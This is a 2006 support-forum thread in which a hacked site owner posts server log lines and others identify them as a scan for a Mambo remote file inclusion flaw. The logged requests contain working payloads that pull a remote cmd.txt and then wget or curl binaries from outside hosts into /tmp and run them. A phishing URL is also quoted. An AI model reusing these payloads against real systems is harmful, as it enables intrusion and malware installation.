Not signed in (Sign In)

Vanilla 1.1.10 is a product of Lussumo. More Information: Documentation, Community Support.

    • CommentAuthorT2
    • CommentTimeApr 17th 2006
     
    My site was hacked by someone doing a phishing scam. Here is the code my service provided sent me.
    ........................................................................................................................................
    It seems some files on your site are vulnerable to hack attempts. Every minute you get atleast 5 hack attempts being made to your site. Here is a sample of the hack attempts:-

    80.48.159.254 - - [05/Apr/2006:08:23:24 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    80.48.159.254 - - [05/Apr/2006:08:23:25 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    80.48.159.254 - - [05/Apr/2006:08:23:26 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20arts%20http://207.90.211.54/arts;chmod%20744%20arts;./arts;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    218.44.74.186 - - [07/Apr/2006:17:00:13 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
    218.44.74.186 - - [07/Apr/2006:17:00:14 -0400] "GET /index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
    218.44.74.186 - - [07/Apr/2006:17:00:16 -0400] "GET /mambo/index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://69.17.157.154/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20hey%20http://207.90.211.54/hey;chmod%20744%20 hey;./hey;echo%20YYY;echo| HTTP/1.1" 400 375 "-" "-"
    81.29.75.120 - - [10/Apr/2006:15:27:32 -0400] "GET /index2.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://210.3.4.193/cmd.txt?&cmd=cd%20/tmp;wget%2070.168.74.193/strange;chmod%20744%20strange;./strange;cd%20/var/tmp;curl%20-o%20ar%20http://207.90.211.54/ar;chmod%20744%20ar;./ar;echo%20YYY;echo| HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    .............................................................................................................................................

    Additionally they sent this:
    There was some password phishing files located at:

    http://fotograbber.com/gallery/mem_bin/FormsLogin.asp/source=halifaxcouk/Halifax/

    Is there a fix for this? I don't have a clue on how to correct this. My service provider is setting me up on another server so I can do a fresh install, but I want to make sure I set it up without being vulnerable to this or any other type of hacking.

    Admittedly, I never gave much thought to security or being hacked. The old "It can't happen to me" mentality. Lesson learned the hard way.

    It goes without saying, your help with this issue will be greatly appreciated.

    Best Regards,
    T2
    •  
      CommentAuthormike
    • CommentTimeApr 17th 2006
     
    What else do you have installed on your machine? Those really don't look like Plogger URL's. Based on the HTTP requests above, I would venture to say that this may have nothing to do with Plogger.

    You running Mambo?
    • CommentAuthorT2
    • CommentTimeApr 17th 2006
     
    I don't even know what Mambo is so I would say no unless this is something that would already be on the serve.

    With my limited knowledge (and limited it is) it looks to me the hack has something to do with GLOBALS and the $GET variable.

    Is that possible?

    T2
    •  
      CommentAuthormike
    • CommentTimeApr 17th 2006
     
    The reason I say it is not Plogger is because none of the variable names in the URL exist in Plogger. $_Request[Itemid], this is not used in Plogger. mosConfig_absolutepath, nowhere to be found. Setting these variables through this "vulnerability" (hint: turn off REGISTER_GLOBALS) would have no effect on any Plogger installation.

    What's up with the file pathname "/mambo/index2.php"? Do you have a folder called mambo on your hosting account?
    • CommentAuthorT2
    • CommentTimeApr 17th 2006
     
    No. However I did have an index2.php when I was customizing the home page and wanted to have the original index file available just in case I screwed something up. The mambo part is a mystery to me.

    I just deleted the gallery and everything else I could on the original server so there is nothing to check there at this point. I hope this won't affect your ability to figure this out.

    If Plogger itself could not be hacked in this way, would you have any idea where the security gap could be?

    Thanks Mike,
    T2
  1.  
    I think this is a random attempt to hack a Mambo site that is not there... So Plogger should be safe enough from this. But such random attacks can put a big strain on a server and is a royal pain in .. yeah.. :-)

    In Mambo, index2 is usually the admin index file.
    • CommentAuthorT2
    • CommentTimeApr 19th 2006
     
    I think you're right. There were phishing files in my directory that I could not delete which suggests the hack was at the server root. Thanks for your input.

    T2